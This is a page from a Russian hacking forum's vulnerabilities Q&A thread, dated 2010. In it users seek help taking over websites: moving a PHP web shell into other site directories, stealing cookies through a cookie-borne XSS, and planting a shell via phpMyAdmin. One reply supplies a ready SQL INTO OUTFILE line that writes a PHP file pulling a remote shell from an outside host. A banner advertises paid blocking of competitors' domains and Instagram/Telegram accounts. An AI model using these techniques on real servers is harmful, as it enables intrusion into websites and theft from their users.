Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1152 из 2438

1152

Опции темы

Поиск в этой теме

Опции просмотра

#11511

07.02.2010, 20:33

xcedz

Познавший АНТИЧАТ

Регистрация: 14.01.2008

Сообщений: 1,165

С нами: 9644006

Репутация: 3099

Цитата:

Сообщение от street16

Подскажите пожалуйста есть шелл!Права uid=33(www-data) gid=33(www-data).safe mode-off!Не подскажите как можно пройти выше по каталогам?стоит Apache/2.2.11 (Ubuntu) DAV/2 SVN/1.5.4 PHP/5.2.6-3ubuntu4.5?токо не судите строго!читал что можно как то открыть порт.и потом к нему присоедениться!

полезно знать команды никсовые.

например вот такие ls -la и cp при удачном стечении обстоятельств можно скопировать с одного места шел в другое. (те в тут да где есть доступ из веб и имеются права на запись.)
ps ето если те нужно попасть на другой сайт на томже серве но он находится в другой дире.

Последний раз редактировалось xcedz; 07.02.2010 в 20:54..

#11512

07.02.2010, 22:12

F@!nT

Новичок

Регистрация: 06.03.2008

Сообщений: 5

С нами: 9568505

Репутация: 0

Здравствуйте.
На сайте есть изменение цвета скина. "Переменная" берется через куки. Т.е. color: green стоит. Если же поставить color: "><script>alert()</script>, то прекрасно срабатывает.
Есть возможность через другой локальный сайт установить для домена сайта, на котором есть уязвимость, куки с xss (или css, точно не знаю).
Возможно ли как-нибудь использовать данную уязвимость, чтобы украсть куки или что-либо другое помимо простого алерта?

#11513

09.02.2010, 08:29

LokbatanLi

Участник форума

Регистрация: 24.08.2009

Сообщений: 172

С нами: 8797559

Репутация: -16

а есть online converter для изменения char => hex ??

#11514

09.02.2010, 10:41

keng

Познающий

Регистрация: 09.04.2008

Сообщений: 79

С нами: 9520453

Репутация: 124

Цитата:

Сообщение от LokbatanLi

а есть online converter для изменения char => hex ??

Например, вот .

#11515

09.02.2010, 11:12

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

С нами: 10585560

Репутация: 1550

Отправить сообщение для Gorev с помощью Yahoo

http://x3k.ru/

#11516

09.02.2010, 15:06

LokbatanLi

Участник форума

Регистрация: 24.08.2009

Сообщений: 172

С нами: 8797559

Репутация: -16

а моjно заливать shell из phpmyadmin-a ??

#11517

09.02.2010, 15:09

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

С нами: 10585560

Репутация: 1550

Цитата:

Сообщение от LokbatanLi

а моjно заливать shell из phpmyadmin-a ??

SELECT '<? @include("http://www.site.com/shell.txt"); ?>' into outfile '/абсолютный путь/shel.php';

#11518

09.02.2010, 15:20

LokbatanLi

Участник форума

Регистрация: 24.08.2009

Сообщений: 172

С нами: 8797559

Репутация: -16

я знаю ету ну не нащел полнуы путь..и поетому из пхпмядмина хо4у заливат shell//

#11519

09.02.2010, 15:25

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

С нами: 10585560

Репутация: 1550

Цитата:

Сообщение от LokbatanLi

я знаю ету ну не нащел полнуы путь..и поетому из пхпмядмина хо4у заливат shell//

по любому что бы залить шелл тебе нужен полный путь, в пхпмаядмине тоже через базу заливать надо...так что без путей никуда

#11520

09.02.2010, 15:26

LokbatanLi

Участник форума

Регистрация: 24.08.2009

Сообщений: 172

С нами: 8797559

Репутация: -16

ok spasibo..

Страница 1152 из 2438

1152

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход